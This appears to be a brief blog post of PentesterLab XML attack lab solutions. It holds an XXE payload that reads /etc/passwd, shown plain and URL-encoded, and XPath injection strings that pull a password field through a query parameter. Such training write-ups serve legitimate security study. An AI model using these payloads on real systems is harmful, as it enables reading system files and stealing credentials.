Example 1

為OOXOXOX

<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>&xxe;

經過URL -encode

%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2ftest%3E

 

 

image

 

 

Example 2

name=' or 1=1]%00

 

 

hacker%27%20or%201=1]/parent::*/password%00

 

image

 

1
example2.php?name=admin%27]/parent::*/password%00

 

image

 

 

arrow
arrow
    文章標籤
    PentesterLab XML attacks
    全站熱搜
    創作者介紹
    創作者 Lung-Yu,Tsai 的頭像
    Lung-Yu,Tsai

    Lung-Yu,Tsai 的部落格

    Lung-Yu,Tsai 發表在 痞客邦 留言(0) 人氣()